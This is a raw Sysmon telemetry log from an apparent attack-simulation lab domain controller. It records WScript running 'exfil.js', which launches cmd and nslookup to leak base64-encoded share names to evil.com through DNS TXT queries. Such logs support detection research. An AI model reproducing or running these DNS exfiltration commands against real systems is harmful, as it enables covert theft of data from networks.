14:21:40.186{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.186{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.186{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.186{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.186{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-CE44-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.186{2E1864BB-18E0-629A-6742-000000005F02}39764768C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-CE44-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.198{2E1864BB-18F4-629A-CE44-000000005F02}5956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliit.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.186{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzbng.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.164{2E1864BB-18F4-629A-CC44-000000005F02}57447668C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-CD44-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.164{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.164{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.164{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.164{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.164{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-CD44-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.164{2E1864BB-18F4-629A-CB44-000000005F02}51522616C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-CD44-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.168{2E1864BB-18F4-629A-CD44-000000005F02}3712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-CB44-000000005F02}5152C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzbng.tmp 2>&1 10341000x8000000000000000211797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.133{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-CC44-000000005F02}5744C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.133{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-CC44-000000005F02}5744C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.133{2E1864BB-18F4-629A-CC44-000000005F02}57447668C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-CB44-000000005F02}5152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.117{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-CC44-000000005F02}5744C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000211793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.723{00000000-0000-0000-0000-000000000000}2812<unknown process>-udpfalsefalse127.0.0.1-50923-false127.0.0.1-53domain 354300x8000000000000000211792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.591{00000000-0000-0000-0000-000000000000}4148<unknown process>-udpfalsefalse127.0.0.1-50921-false127.0.0.1-53domain 354300x8000000000000000211791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.319{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-50914-false127.0.0.1-53domain 10341000x8000000000000000211790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.101{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.101{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.318{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-50913-false127.0.0.1-53domain 10341000x8000000000000000211787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.101{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.101{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.101{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-CB44-000000005F02}5152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000211784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.256{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-50910-false127.0.0.1-53domain 10341000x8000000000000000211783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.101{2E1864BB-18E0-629A-6742-000000005F02}39765216C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-CB44-000000005F02}5152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.115{2E1864BB-18F4-629A-CB44-000000005F02}5152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzbng.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.101{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqcto.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.065{2E1864BB-18F4-629A-C944-000000005F02}49967732C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-CA44-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.065{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+